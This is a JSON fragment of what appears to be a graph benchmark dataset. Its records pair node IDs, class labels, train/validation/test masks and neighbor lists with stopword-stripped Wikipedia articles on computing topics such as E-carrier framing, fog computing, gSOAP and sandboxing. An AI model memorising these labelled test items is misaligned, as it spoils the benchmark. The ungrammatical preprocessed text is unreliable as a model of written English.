    "text": "E-carrier:e-carrier e-carrier member series carrier systems developed digital transmission many simultaneous telephone calls time-division multiplexing european conference postal telecommunications administrations cept originally standardized e-carrier system revised improved earlier american t-carrier technology adopted international telecommunication union telecommunication standardization sector itu-t widely adopted almost countries outside us canada japan e-carrier deployments steadily replaced ethernet telecommunication networks transitions towards ip e1 link operates two separate sets wires usually unshielded twisted pair balanced cable using coaxial unbalanced cable nominal 3 volt peak signal encoded pulses using method avoiding long periods without polarity changes line data rate 2.048 mbit/s full duplex i.e 2.048 mbit/s downstream 2.048 mbit/s upstream split 32 timeslots allocated 8 bits turn thus timeslot sends receives 8-bit pcm sample usually encoded according a-law algorithm 8,000 times per second 8 × 8,000 × 32 2,048,000 ideal voice telephone calls voice sampled data rate reconstructed end timeslots numbered 0 31 e1 frame defines cyclical set 32 time slots 8 bits time slot 0 devoted transmission management time slot 16 signaling rest assigned originally voice/data transport main characteristics 2-mbit/s frame described following one timeslot ts0 reserved framing purposes alternately transmits fixed pattern allows receiver lock onto start frame match channel turn standards allow full cyclic redundancy check performed across bits transmitted frame detect circuit losing bits information always used alarm signal may also transmitted using timeslot ts0 finally bits reserved national use one timeslot ts16 often reserved signalling purposes control call setup teardown according one several standard telecommunications protocols includes channel-associated signaling cas set bits used replicate opening closing circuit picking telephone receiver pulsing digits rotary phone using tone signalling passed voice circuits recent systems use common-channel signaling ccs signalling system 7 ss7 particular timeslot reserved signalling purposes signalling protocol transmitted freely chosen set timeslots different physical channel e1 channel communication consists sending consecutive frames transmitter receiver receiver must receive indication showing first interval frame begins since knows channel information time slot corresponds demultiplex correctly way bytes received slot assigned correct channel synchronization process established known frame alignment order implement frame alignment system receiver frame tell begins called frame alignment signal fas 2 mbit/s frame system fas combination seven fixed bits 0011011 transmitted first time slot frame time slot zero ts0 alignment mechanism maintained fas need transmitted every frame instead signal sent alternate frames first third fifth case ts0 used synchronization slot ts0 rest frames therefore available functions transmission alarms ts0 frames fas first bit dedicated carrying cyclic redundancy checksum crc tells us whether one bit errors specific group data received previous block eight frames known submultiframe aim system avoid loss synchronization due coincidental appearance sequence 0011011 time slot ts0 frame fas implement crc code transmission 2 mbit/s frames crc-4 multiframe built made 16 frames grouped two blocks eight frames called submultiframes crc checksum word four bits crc-4 put positions ci bits 1 frames fas next submultiframe receiving end crc submultiframe calculated locally compared crc value received next submultiframe coincide one bit errors determined found block alarm sent back transmitter indicating block received far end contains errors receiving end know first bit crc-4 word c1 reason crc-4 multiframe alignment word needed obviously receiver told multiframe begins synchronization crc-4 multiframe alignment word set combination 0011011 introduced first bits frames contain fas signal crc-4 method mainly used protect communication wrong frame alignment word also provide certain degree monitoring bit error rate ber low values around 10 method suitable cases ber around 10 block contains least one errored bit another advantage using crc bits transmitted checked unlike systems check seven bits fas ones known advance every 51 bits one fas next however crc-4 code completely infallible since probability around error may occur detected 6.25 blocks may contain errors detected code aim monitoring errors continuously check transmission quality without disturbing information traffic quality required standard taking necessary steps improve telephone traffic two way means information transmitted directions ends communication turn means two 2 mbit/s channels two directions transmission must considered crc-4 multiframe alignment word takes six first eight bits ts0 without fas two bits every second block submultiframe whose task indicate block errors far end communication mechanism follows bits called e-bits 1 default value far end communication receives 2 mbit/s frame detects erroneous block puts 0 e-bit corresponds block frame sent along return path transmitter way near end communication informed erroneous block detected ends information one crc-4 procedure e bits number frames multiframe 0 15 e-bit frame 13 refers submultiframe block received far end e-bit frame 15 refers submultiframe ii block ii bits position 2 ts0 frame contain fas called supervision bits set “ 1 ” avoid simulations fas signal bits ts0 contain fas positions 3–8 make known non-frame alignment signal nfas signal sent alternate frames frame 1 frame 3 frame 5 etc. first bit nfas bit 3 ts0 used indicate alarm occurred far end communication operating normally set 0 value 1 indicates alarm bits positions 4–8 spare bits one single application used number ways decided telecommunications carrier accordance itu-t rec g.704 bits used specific point-to-point applications establish data link based messages operations management maintenance monitoring transmission quality spare bits nfas used must set 1 international links method used transmit alarm makes use fact telephone systems transmission always two way multiplexing/demultiplexing devices known generically multiplex devices installed ends communication transmission reception frames alarm must sent transmitter device detects either power failure failure coder/decoder multiplexer following demultiplexer loss signal los loss frame alignment lof ber greater 10 remote alarm indication rai sent nfas return frames bit 3 set 1 transmitter considers serious alarm goes generating series operations depending type alarm condition detected well transmitting information generated users telephone network also necessary transmit signaling information signaling refers protocols must established exchanges users exchange information signals indicate subscriber picked telephone start dial number another subscriber calls well signals let communication link maintained e1 pcm system signaling information transmitted two different methods common channel signaling ccs method channel associated signaling cas method cases time slot ts16 basic 2 mbit/s frame used transmit signaling information ccs signaling messages several bytes transmitted 64 kbit/s channel provided ts16 frame messages providing signaling channels frame message contains information determines channel signaling signaling circuits access 64 kbit/s channel ts16 also common channels signaled different ccs systems constitute complex protocols following section way example channel associated signaling looked based e1 signal itu defined hierarchy plesiochronous signals enables signals transported rates 140 mbit/s section describes characteristics hierarchy mechanism dealing fluctuations respect nominal values rates produced consequence tolerances system case level 1 plesiochronous digital hierarchy 2 mbit/s higher levels multiplexing carried bit bit unlike multiplexing 64 kbit/s channels 2 mbit/s signal byte byte thus making impossible identify lower level frames inside higher level frame recovering tributary frames requires signal fully demultiplexed higher hierarchical levels 8,448 34,368 139,264 kbit/s etc referred 8 34 140 mbit/s simplicity obtained multiplexing four lower level frames within frame whose nominal transmission rate four times lower level see table 3 order leave room permitted variations rate justification bits well corresponding fas alarm spare bits 8 mbit/s frame structure defined itu-t rec g.742 frame divided four groups length 212 bits structure frame described itu-t rec g.751 see figure 20 previous case frame divided four groups length 384 bits structure frame described itu-t rec g.751 see figure 20 case frame divided six groups length 488 bits groups containing fas 8 34 140 mbit/s frames alarm bits spare bits also found known service bits a-bits alarm carry alarm indication remote multiplexing device certain breakdown conditions detected near-end device spare bits designed national use must set 1 digital paths cross international boundaries far synchronization concerned multiplexing plesiochronous signals completely trouble free especially comes demultiplexing circuits pcm multiplexer 30 2 channels sample output signal clock 1/32 sent coders input channels synchronized output frame however higher level multiplexers receive frames lower level multiplexers clocks whose value fluctuates around nominal frequency value within certain margins tolerance margins set itu-t recommendations hierarchical level signals thus formed almost synchronous except differences within permitted margins tolerance reason called plesiochronous order perform bit-by-bit tdm higher-order pdh multiplexer elastic memories inputs incoming bits lower level signal line tributary written since tributary signals different rates asynchronous respect prevent capacity elastic memories overflowing multiplexer reads incoming bits maximum rate permitted within range tolerances rate incoming flow tributary lines reading rate multiplexer read bits elastic memory uses stuffing bit justification bit called justification opportunity output aggregate signal task adapting signal enters multiplexer rate signal transmitted within output frame highest clock value type justification called positive justification justification bits together overhead bits make output rate higher total input signals task justification opportunity bits r-bits available extra bits used rate incoming tributaries higher nominal value within margin specified itu-t amount makes necessary case opportunity bit longer mere stuffing becomes information bit instead order device receives multiplexed signal able determine whether justification opportunity bit contains useful information i.e information tributary justification control bits j-bits included frame group control bits refers one tributaries frame set 0 associated opportunity bit carrying useful information otherwise set 1 several bits used instead one provide protection possible errors transmission examining control bits received value decided sent majority value 1 1s 0s instance assumed error bits 0 seen dispersion control bits referring tributary causes separate groups spreading j-bits control bits reduces probability errors occurring wrong decision made whether used useful data bit wrong decision made error output data also slip one bit loss repetition one bit information a-bit fas 8 34 140 mbit/s frames enables multiplexers correspond hierarchies transmit alarm indications far ends multiplexer detects alarm condition addition 140 mbit/s multiplexers also transmit alarm indication faced loss frame alignment 34-mbit/s signals received inside 140 mbit/s signals well nfas 34 mbit/s signal lost alignment bit 11 group changes 0 1 return channel pdh based e0 signal rate designed higher level multiplex set lower level signals framed e1 designed carry 30 31 e0 data channels plus 1 2 special channels levels designed carry 4 signals level necessity overhead bits justification bits account rate differences sections network subsequent level capacity greater would expected simply multiplying lower level signal rate example e2 8.448 mbit/s 8.192 mbit/s one might expect multiplying e1 rate 4 note bit interleaving used difficult demultiplex low level tributaries directly requiring equipment individually demultiplex every single level one required",
    "neighbors": [
      3168,
      8192,
      1955,
      2787,
      1893,
      7108,
      7815,
      2860,
      2989,
      4590,
      2863,
      10833,
      2994,
      3156,
      7799,
      1437,
      4543
    ],
    "mask": "None"
  },
  {
    "node_id": 4964,
    "label": 7,
    "text": "Fog_computing:fog computing fog computing fog networking also known fogging architecture uses edge devices carry substantial amount computation storage communication locally routed internet backbone fog computing perceived large cloud systems big data structures making reference growing difficulties accessing information objectively results lack quality obtained content effects fog computing cloud computing big data systems may vary however common aspect limitation accurate content distribution issue tackled creation metrics attempt improve accuracy fog networking consists control plane data plane example data plane fog computing enables computing services reside edge network opposed servers data-center compared cloud computing fog computing emphasizes proximity end-users client objectives dense geographical distribution local resource pooling latency reduction backbone bandwidth savings achieve better quality service qos edge analytics/stream mining resulting superior user-experience redundancy case failure also able used assisted living scenarios fog networking supports internet things iot concept devices used humans daily basis connected examples include phones wearable health monitoring devices connected vehicle augmented reality using devices google glass spawar division us navy prototyping testing scalable secure disruption tolerant mesh network protect strategic military assets stationary mobile machine control applications running mesh nodes take internet connectivity lost use cases include internet things e.g smart drone swarms iso/iec 20248 provides method whereby data objects identified edge computing using automated identification data carriers aidc barcode and/or rfid tag read interpreted verified made available fog edge even aidc tag moved 2010 need extend cloud computing fog computing emerged order cope huge number iot devices big data volumes real-time low-latency applications november 19 2015 cisco systems arm holdings dell intel microsoft princeton university founded openfog consortium promote interests development fog computing cisco sr. managing-director helder antunes became consortium first chairman intel chief iot strategist jeff fedders became first president cloud computing fog computing provide storage applications data end-users however fog computing closer proximity end-users bigger geographical distribution ‘ cloud computing ’ practice using network remote servers hosted internet store manage process data rather local server personal computer cloud computing heavyweight dense form computing power ‘ fog computing ’ term defined flavio bonomi group cisco systems september 2010 refers extending cloud computing edge enterprise network also known edge computing fogging fog computing facilitates operation compute storage networking services end devices cloud computing data centers edge computing typically referred location services instantiated fog computing implies distribution communication computation storage resources services close devices systems control end-users fog computing medium weight intermediate level computing power rather substitute fog computing often serves complement cloud computing national institute standards technology march 2018 released definition fog computing adopting much cisco commercial terminology nist special publication 500-325 fog computing conceptual model defines fog computing horizontal physical virtual resource paradigm resides smart end-devices traditional cloud computing data center paradigm supports vertically-isolated latency-sensitive applications providing ubiquitous scalable layered federated distributed computing storage network connectivity thus fog computing distinguished distance edge per theoretical model fog computing fog computing nodes physically functionally operative edge nodes centralized cloud much terminology defined including key architectural terms like smart distinction fog computing edge computing generally agreed acceptance fog computing considered energy efficient compared cloud computing ieee adopted fog computing standards proposed openfog consortium",
    "neighbors": [
      8576,
      516,
      8326,
      11156,
      9366,
      154,
      8098,
      10921,
      428,
      2605,
      3886,
      6834,
      9779,
      1849,
      321,
      6981,
      8262,
      11473,
      7638,
      4957,
      477,
      4194,
      8675,
      9314,
      754,
      2804,
      1400
    ],
    "mask": "None"
  },
  {
    "node_id": 4965,
    "label": 4,
    "text": "Strong_authentication:strong authentication strong authentication notion several definitions strong authentication often confused two-factor authentication generally multi-factor authentication however strong authentication necessarily multi-factor authentication soliciting multiple answers challenge questions may considered strong authentication unless process also retrieves 'something 'something would considered multi-factor authentication ffiec issued supplemental guidance subject august 2006 clarified definition true multifactor authentication requires use solutions two three categories factors using multiple solutions category ... would constitute multifactor authentication another commonly found class definitions relates cryptographic process precisely authentication based challenge response protocol type definition found handbook applied cryptography type definition necessarily relate two-factor authentication since secret key used challenge-response authentication scheme simply derived password one factor third class definitions says strong authentication form authentication verification accomplished without transmission password case example definition found fermilab documentation fourth class legal standing within european economic area strong customer authentication fast identity online fido alliance striving establish technical specifications strong authentication 250 members 150 certified products thus term strong authentication used long notion strong defined context use",
    "neighbors": [
      11619,
      5433,
      3271,
      6220,
      5389,
      11244,
      11185,
      1945,
      6204,
      5918,
      4575
    ],
    "mask": "Test"
  },
  {
    "node_id": 4966,
    "label": 2,
    "text": "DX10:dx10 dx10 general purpose multitasking operating system designed operate texas instruments 990/10 990/10a 990/12 minicomputers using memory mapping feature dx10 versatile disk-based operating system capable supporting wide range commercial industrial applications dx10 also multiterminal system capable making several users appear exclusive control system dx10 international operating system designed meet commercial requirements united states european countries japan dx10 supported several models video display terminals vdts permit users enter view process data language dx10 required basic hardware configuration allows additional members extensive group peripherals included configuration system generation could configure dx10 support peripheral devices members 990 family devices require realtime support capability required also provide software control devices communicated dx10 easily system command interpreter sci sci designed provide simple convenient interaction user dx10 conversational format sci access complete control dx10 sci flexible mode communication sci convenient interactive communication data terminal sci accessed batch mode well dx10 capable extensive file management built-in file structures include key indexed files relative record files sequential files group file control utilities exists copying modifying files controlling file parameters dx10 offers number features provide convenient use system's capabilities",
    "neighbors": [
      2179,
      2345,
      8524,
      7983,
      10068,
      3960,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 4967,
    "label": 8,
    "text": "Sportradar:sportradar sportradar ag multinational corporation headquarters st. gallen switzerland collects analyzes sports data sportradar provides services bookmakers national international sports federations media companies january 2016 company 35 offices 24 countries around world including trondheim london ljubljana sportradar products includes live results statistics white-label sports content solutions brand betradar sportradar operates suite tools bookmakers including in-game pre-match odds suggestions resulting market monitoring trading services us subsidiary sportradar us sportradar official data provider us sports federations nfl nhl nascar end 2015 sportradar renewed partnership international tennis federation official data collection service partner 2016 sportradar entered partnership nba third partnership big four since 2005 company partnership german football association detect fraud match fixing system later developed launched fraud detection system addition detection fraud sportradar organizes integrity workshops together federations major league soccer serie international ice hockey federation workshops teach clubs players betting market works different forms match fixing match manipulation detected sportradar started market monitor founded 2000 trondheim norway petter fornæss tore steinkjer market monitor provided services online bookmakers based crawler technology developed part thesis norwegian university science technology market monitor together austrian german partners created product betradar.com 2001 betradar.com provides set reporting monitoring tools online betting markets carsten koerl joined market monitor major investor obtaining 51 shares 2007 sportradar ag founded owners market monitor served parent company various companies group market monitor renamed sportradar became subsidiary sportradar ag 2012 sportradar acquired slovenian development company klika later year eqt acquired minority stake investing 44 million euro company sportradar expansions continued 2013 sportradar became majority shareholder usk-based sportstat sportstat official data collection partner http //www.insidermedia.com/insider/wales/87716-sportstat-merges-swiss-business/ 2013 sportradar also advanced us market acquiring sportsdata sportradar us eqt reinvested sportradar 2014 eqt flagship fund buying shares eqt capital expansion ii 2015 sportradar obtained exclusive distribution rights nascar nfl nhl year sportradar attracted investments michael jordan mark cuban led revolution llc national football league also acquired equity sportradar us part partnership 2016 sportradar acquired core business sportman media holding including laola1.at laola1.tv later year nba announced multi-year partnership sportradar involving integrity services data distribution video streaming sportradar provides federations law enforcement agencies system detecting betting related match fixing services operated sportradar security services division headquarters london england sportradar sport integrity services began early warning system developed 2005 following hoyzer scandal use system one measures bundesliga took prevention match fixing system developed include live monitoring relaunched 2009 fraud detection system fds development fds done cooperation uefa partnership sportradar monitors suspicious matches two top leagues every uefa member nation fds since expanded partnerships sports federations including concacaf fiba esl ioc sportradar also signed agreements several law enforcement agencies notably europol australian federal police fraud detection system works comparing odds movement patterns online bookmakers expected odds movement patterns given match suspicious matches found analyzed reported relevant federation federation start investigations 2015 fraud detection system monitors 65 000 matches across 11 sports half soccer daily system receives roughly 5 billion odds adjustments around 450 different bookmakers since launch fraud detection system sportradar involved several notable match fixing cases nepal scandal 2015 austrian case including sanel kuljić 2013 australian match fixing case 2013 system indicated since 2009 2000 events likely manipulated addition sportradar provides workshops clubs federations educate consequences match fixing sportradar sports distribution covers 325 000 sport events feeds clients like google fox sports sportradar also provides data facebook sports stadium brand betradar sportradar provides bookmakers number sports betting services 2015 sportradar partnered roughly 450 bookmakers including bet365 william hill paddy power ladbrokes sportradar services also used state lotteries veikkaus svenska spel norsk tipping sportradar create odds thousands games across 40 sports odds created feeding sports data collected sportradar mathematical models in-game betting odds requires continuous recalculation outcomes using live data sportradar collects acquires licenses odds sold odds suggestions bookmakers matches bookmakers unable create odds similarly sportradar provides information bookmakers matches start finish allow money placed matches finished subset sportradar collected data goes extensive quality assurance process specialised bet clearing sportradar also provides market monitoring allows bookmakers compare odds rest market bookmakers provide odds make use service thus making odds part comparison bookmakers service allows bookmakers ensure unwanted surebet situation august 12 2019 sportradar extended relationship national football league become exclusive provider official league data sports betting operators united states internationally jurisdictions betting legal regulated sportradar also use integrity services monitor betting nfl games right distribute live audiovisual feeds nfl games sportsbooks select international markets sportradar partnered several sports federations collect distribute sports data handball-bundesliga sportradar collects distributes official data itf umpire enters data directly sportradar systems nhl sportradar ingests redistributes data coming nhl tracking system partnerships us federations nascar nhl nfl handled us subsidiary sportradar us partly order avoid conflict interest federation sportradar involvement betting industry distribution partnerships also include creating official web mobile solutions well rights stream video content partnerships one esl include using data expand sportradar betting services deal signed october 2015 sportradar provide football association malaysia platform managing federation platform federation manage things schedules leagues personnel players referees tool also provides means collecting live data distributed teams partners visualised various web solutions",
    "neighbors": [
      113,
      4967
    ],
    "mask": "Test"
  },
  {
    "node_id": 4968,
    "label": 3,
    "text": "Exec_(system_call):exec system call computing exec functionality operating system runs executable file context already existing process replacing previous executable act also referred overlay especially important unix-like systems although operating systems implement well since new process created original process identifier pid change machine code data heap stack process replaced new program exec call supported many programming languages including compilable languages scripting languages os command interpreters built-in command replaces shell process specified program interfaces exec implementations vary depending programming language may accessible via one functions depending operating system may represented one actual system calls reason exec sometimes described collection functions standard names functions c see exec linux kernel one corresponding system call named execve whereas aforementioned functions user-space wrappers around higher-level languages usually provide one call named posix standard declares exec functions header file c language functions declared dos see os/2 microsoft windows implementations provide functions named leading underscore e.g _execl base exec execute followed one letters calls new process image inherits current environment variables file descriptor open exec call made remain open new process image unless marked codice_2 codice_3 opened codice_4 latter introduced posix.1-2001 aspect used specify standard streams stdin stdout stderr new program successful overlay destroys previous memory address space process memory areas shared reclaimed operating system consequently data passed new program otherwise saved become lost successful exec replaces current process image return anything program made call processes exit status exec-ing termination process continues exist exec function return calling program error occurred case return value −1 errno set one following values linux kernel may destroy memory map old process start constructing loading new executable discover new executable ca n't loaded example fields executable internal tables contain invalid values case process killed fatal signal sigsegv ideally kernel would fail codice_5 return error indication old executable would significantly complex slower dos multitasking operating system replacing previous executable image great merit due harsh primary memory limitations lack virtual memory api used overlaying programs dos effects similar ones posix systems ms-dos exec functions always load new program memory maximum allocation program executable file header set default value 0xffff exehdr utility used change maximum allocation field program however done program invoked one exec functions program might behave differently program invoked directly operating-system command line one spawn functions see many unix shells also offer builtin command replaces shell process specified program wrapper scripts often use command run program either directly interpreter virtual machine setting environment variables configuration using exec resources used shell program need stay use program started command also perform redirection shells passing arguments means use command redirection without making actual overlay traditional unix system functionality create new process running new executable program one step explains importance exec unix programming systems may use spawn main tool running executables result equivalent fork-exec sequence unix-like systems posix supports posix_spawn routines optional extension usually implemented using vfork os/360 successors include system call xctl transfer control performs similar function exec except type 4 svc usage rare common use link attach invoke load module without terminating current load module particular tso invokes commands attach sharing memory",
    "neighbors": [
      8975,
      10387,
      11539,
      5397,
      6813,
      1952,
      7847,
      10407,
      2345,
      7983,
      5040,
      2045,
      11442,
      9780,
      8262,
      4423,
      2253,
      9166,
      10063,
      10835,
      10584,
      7421,
      8414,
      4703,
      6498,
      868,
      4850,
      9330,
      5492,
      9714,
      3062,
      7933,
      2942
    ],
    "mask": "Test"
  },
  {
    "node_id": 4969,
    "label": 4,
    "text": "Authenticated_Received_Chain:authenticated received chain authenticated received chain arc email authentication system designed allow intermediate mail server like mailing list forwarding service sign email original authentication results allows receiving service validate email email spf dkim records rendered invalid intermediate server processing arc defined rfc 8617 published july 2019 experimental dmarc allows sender domain indicate emails protected spf and/or dkim tells receiving service neither authentication methods passes reject message however strict dmarc policy may block legitimate emails sent mailing list forwarder spf check fail due unapproved sender dkim signature invalidated message modified adding subject tag footer arc helps solve problem giving intermediate servers way sign original message validation results even spf dkim validation fail receiving service choose validate arc arc indicates original message passed spf dkim checks modifications made intermediaries trusted receiving service receiving service may choose accept email arc defines three new mail headers sign modification intermediate server performs following steps validate arc recipient performs following steps",
    "neighbors": [
      4793,
      8130
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4970,
    "label": 7,
    "text": "Firmex:firmex firmex cloud-based virtual data room service provider headquartered toronto ontario canada virtual data rooms facilitate secure document sharing across corporate firewalls used highly confidential complex transactions seen corporate finance procurement well regulatory compliance governance processes 2004 davies ward phillips vineberg toronto-based international business law firm contracted version 5.1 develop davies deal room online virtual data room software designed facilitate legal transactions transactions project commercialized version 5.1 2006 firmex inc. 2007 2008 firmex raised total 4.4 million angel investors end 2009 company licensed 500 customers running 2,500 transactions year 2011 firmex reached customer milestone 1,000 2012 company workforce grew 25 percent 2014 firmex named 13 deloitte technology fast 50 2015 firmex deloitte fast 500 winner https //www2.deloitte.com/content/dam/deloitte/us/documents/technology-media-telecommunications/technology-fast-500-winners-ranking-list.pdf 2016 novacap montreal-based private equity fund acquired majority interest firmex http //www.novacap.ca/en/news/tmt/novacap-invests-in-firmex-to-accelerate-growth/ firmex customers started 12000 virtual data rooms 2018 firmex expanded european operations opening office london england https //www.firmex.com/blog/news/firmex-opens-new-emea-headquarters-london-uk/ 2019 vertu capital toronto-based private equity fund bdc capital firmex management acquired firmex https //www.pehub.com/2019/02/vertu-and-bdc-to-acquire-firmex-from-novacap/",
    "neighbors": [
      10185,
      4623,
      10161,
      5650,
      2267
    ],
    "mask": "None"
  },
  {
    "node_id": 4971,
    "label": 0,
    "text": "TIMIT:timit timit corpus phonemically lexically transcribed speech american english speakers different sexes dialects transcribed element delineated time timit designed acoustic-phonetic knowledge automatic speech recognition systems commissioned darpa corpus design joint effort massachusetts institute technology sri international texas instruments ti speech recorded ti transcribed mit verified prepared publishing national institute standards technology nist also telephone bandwidth version called ntimit network timit timit ntimit freely available — either membership linguistic data consortium monetary payment required access dataset",
    "neighbors": [
      5667,
      3721,
      9577,
      5903,
      10160,
      10965,
      5214
    ],
    "mask": "None"
  },
  {
    "node_id": 4972,
    "label": 2,
    "text": "Sandbox_(computer_security):sandbox computer security computer security sandbox security mechanism separating running programs usually effort mitigate system failures software vulnerabilities spreading often used execute untested untrusted programs code possibly unverified untrusted third parties suppliers users websites without risking harm host machine operating system sandbox typically provides tightly controlled set resources guest programs run scratch space disk memory network access ability inspect host system read input devices usually disallowed heavily restricted sense providing highly controlled environment sandboxes may seen specific example virtualization sandboxing frequently used test unverified programs may contain virus malicious code without allowing software harm host device sandbox implemented executing software restricted operating system environment thus controlling resources example file descriptors memory file system space etc process may use examples sandbox implementations include following use cases sandboxes include following",
    "neighbors": [
      537,
      6171,
      9244,
      3102,
      10785,
      550,
      10284,
      2107,
      3643,
      7739,
      5697,
      2118,
      2558,
      1623,
      11365,
      8296,
      9841,
      9356,
      7822,
      8846,
      6800,
      10388,
      10900,
      8344,
      6813,
      2213,
      4775,
      171,
      7851,
      174,
      719,
      9424,
      3286,
      231,
      5872,
      6411,
      9488,
      6431,
      5411,
      8998,
      4905,
      10026,
      3371,
      4908,
      10539,
      7983,
      1842,
      3381,
      1348,
      8012,
      339,
      6486,
      4439,
      5465,
      7515,
      8539,
      3944,
      4464,
      2949,
      3462,
      6023,
      7560,
      910,
      2448,
      7578,
      3484,
      11166,
      2975,
      5024,
      8106,
      7601,
      3506,
      10673,
      7106,
      1994,
      4048,
      5078,
      4585,
      4075,
      10221,
      3054,
      9714,
      9715,
      10232,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 4973,
    "label": 3,
    "text": "Blagger_(video_game):blagger video game blagger platform game created antony crowther commodore 64 released alligata 1983 bbc micro port released year acorn electron amstrad cpc amsoft msx 1984 commodore 16 plus/4 1985 countries game released name gangster gameplay similar manic miner also released 1983 sequel son blagger released 1984 third final title blagger goes hollywood released 1985 game divided series single-screen levels goal player screen manipulate blagger burglar collect scattered keys reach safe keys must collected safe opened set amount time blagger walk either left right jump left right jumping action fixed pattern altered initiated gameplay reduces learning best order collect keys correct timing movements jumping platforms solid decay blagger walked platforms serve move blagger particular direction blagger die touches cacti one moving enemy obstacles level falls certain distance moving enemies vary level level include cars aliens mad hatters giant mouths movement enemies fixed pattern repeatedly travelling one point another back bbc electron versions feature floating rg hazards r.g initials programmer versions r.s goodley",
    "neighbors": [
      9322,
      9006,
      1527
    ],
    "mask": "Test"
  },
  {
    "node_id": 4974,
    "label": 8,
    "text": "GSOAP:gsoap gsoap c c++ software development toolkit soap/xml web services generic xml data bindings gsoap tools generate efficient source code xml serialization type c/c++ data zero-copy overhead gsoap toolkit started research project florida state university professor robert van engelen 1999 project introduced new methods highly-efficient xml parsing pull parsing serialization c/c++ data directly xml later also soap project succeeded defining type-safe data bindings xml schema types wide variety c/c++ data types toolkit uses automatic programming simplify development invocation web services using efficient auto-generated xml serializers send receive c/c++ data directly domain-specific compiler-based tool generates source code efficiently converts native c/c++ data structures xml back toolkit developed support soap web services messaging protocol introduced around time therefore name gsoap generic xml soap use approach scientific data exchange development maintenance software took place ownership genivia inc includes addition new wsdl xml schema processing capabilities well addition many ws-* web services protocol capabilities ws-security optimizations xml-rpc messaging support json data format plugin modules integrate gsoap apache iis web servers third-party plugins grid services gsoap toolkit written portable c/c++ uses form bootstrapping generating code implement converter translate wsdl/xsd specifications c/c++ source code wsdl/xsd meta-data bindings gsoap software licensed gplv2 open source license commercial-use source code licenses gsoap software widely used industrial projects mission-critical infrastructures example web service operation c retrieving lodging rate hotel given number guests declared annotated form last parameter function always service return value denoted void one-way operations struct/class bundle multiple service return parameters function int return value used error diagnostics service invocation c using auto-generated soap_call_ns__get_rate function executed follows facilitate web services implementations legacy c c++ systems prefix qualification identifier names c/c++ omitted replaced colon notation example ns get_rate rather ns__get_rate punctuation removed auto-generated source code used project builds service invocation c++ using auto-generated proxy class executed follows using proxy default endpoint url soap action values using annotations identifier naming conventions i.e qualification prefix ns__ function ns__get_rate declaring properties ns namespace using //gsoap directives example binding established web service operations auto-generated web services description language wsdl document declares request message response message get-rate operation porttype interface soap binding ns__get_rate function follows request responses messages operation refer xml elements defined types section wsdl follows likewise client server c/c++ source code auto-generated set wsdls xml schemas services must completed defining appropriate service operations example auto-generated c++ service class wsdl must completed defining get_rate method follows restrictions type operation parameters marshaled xml web service messaging except certain type declaration conventions annotations followed establish data binding establish xml data binding c/c++ data types gsoap uses three basic forms source code annotation directives identifier naming conventions punctuation fully annotated structure declaration c hierarchical employee record may appear following annotations conventions used gsoap tools convert c/c++ data types to/from xml schema data types since c support namespaces struct/class member names namespace-qualified c++ use identifier naming conventions gsoap allow binding structure members xml schema complextype auto-generated follows furthermore unions struct/class annotated special selector field union member selection mapped to/from schema choice particles stl containers mapped to/from sequence particles enumerations mapped to/from xml schema simpletype enumerations standard c/c++ primitive types mapped to/from xsd types conversion xsd schema c/c++ data types actual mapping configurable gsoap type mapping file instance example hierarchical employee structure serialized xml tree default example soap encoding style enabled xml serialization gsoap respects co-referenced objects cyclic data structures per soap encoding rules resulting xml id-ref edges auto-generated xml data binding includes read write operations to/from file string stream example ns__employee_record object read write operations read employee record xml file parsed xml internally validated data bindings constraints application data sent received to/from rest xml service xml data binding provides rest xml api calls example given ns__employee_record xml data binding previous section following get put post operations auto-generated post functions called together first post_send transmit xml data endpoint url followed post_recv accept response data may different type received xml internally validated data bindings constraints",
    "neighbors": [
      11105,
      10020,
      7878,
      8070,
      425,
      5612,
      6284,
      7983,
      4561,
      4658,
      6353,
      6357,
      10486,
      7320,
      4572,
      2045,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4975,
    "label": 4,
    "text": "Message_forgery:message forgery cryptography message forgery sending message deceive recipient real sender common example sending spam prank e-mail originated address one really used",
    "neighbors": [
      262
    ],
    "mask": "Test"
  },
  {
    "node_id": 4976,
    "label": 7,
    "text": "LoginRadius:loginradius loginradius inc. cloud based saas customer identity access management platform based vancouver british columbia canada established 2012 loginradius started 2012 two friends deepak gupta rakesh soni social login widget interview soni said duo started company recognizing hassles registration websites negative effects conversion rates according company loginradius platform 200 pre-built integrations different customer relationship management ad platform email marketing tools platform involved collection customer data traditional email based registration social profile data acquired customer data secured cloud based storage loginradius also provides single customer view customer data aggregated one record organizations using loginradius platform integrate marketing tools",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4977,
    "label": 7,
    "text": "Nivio:nivio nivio company marketing desktop virtualization services allow customer use computer application software without personal computer sachin dev duggal saurabh pradeep dhoot founded nivio 2004 two founders met students imperial college london 2000 initial funding came two executives deutsche bank duggal worked time claimed idea came 20 minutes presentation headquarters switzerland development center gurgaon nvivo announced test first online windows xp-based desktop service 2007 early reviews mixed noting high data-rate continuous connections needed good response times existing products companies citrix systems advanced micro devices announced investment undisclosed value august 2007 several patents related technology assigned smx inet global services sa nivio subsidiary december 2008 nivio named technology pioneer world economic forum affordable computing access nivio announced nivio companion june 2009 bharti airtel limited india internet service provider companion low-cost product including keyboard mouse set-top-box style terminal monthly service charge user gets internet access microsoft office 2007 functionality 10 gbytes storage one motivation given rampant software piracy india indian media reported company young founders since 2007 january 2010 duggal promoted cloud computing world economic forum davos february 2010 nivio announced operations australia hosted nec polaris data centre springfield queensland july 2010 company estimated us 5 million revenues profitable earlier nivio companion product called test november 2010 duggal dhoot claimed goal education 2012 nivio reported announce devices called cloudbook cloudpc provide access services although us patent trademark office shows cloudbook trademark application date december 2009 nholdings business nivio product everex marketed cloudbook around 2008 registration nholdings sa gives location mont-sur-lausanne formerly using name smx inet global services sa microsoft remote desktop services technology allowed nivio officially licensed service provider license agreement use remote desktop protocol contrasts services onlive desktop trucloud licensing terms raised questions press approach also contrasted official support microsoft office ipad videocon aec partners invested us 21 million company february 2012 co-founder dhoot nephew videocon chairman venugopal dhoot offices opened palo alto california silicon valley well new delhi april 2012 nivio announced application use microsoft office files stored google drive product received mixed reviews since products still by-invitation beta testing stages judged easy use kate russell bbc reported company products august 2012 near end 2012 duggal stepped operational roles nivio frank houghton became chief operating officer company announced would provide services businesses stuart collingwood president europe middle east africa 2014 company appears gone web site shut twitter feed dormant since 2013",
    "neighbors": [
      4194,
      8355,
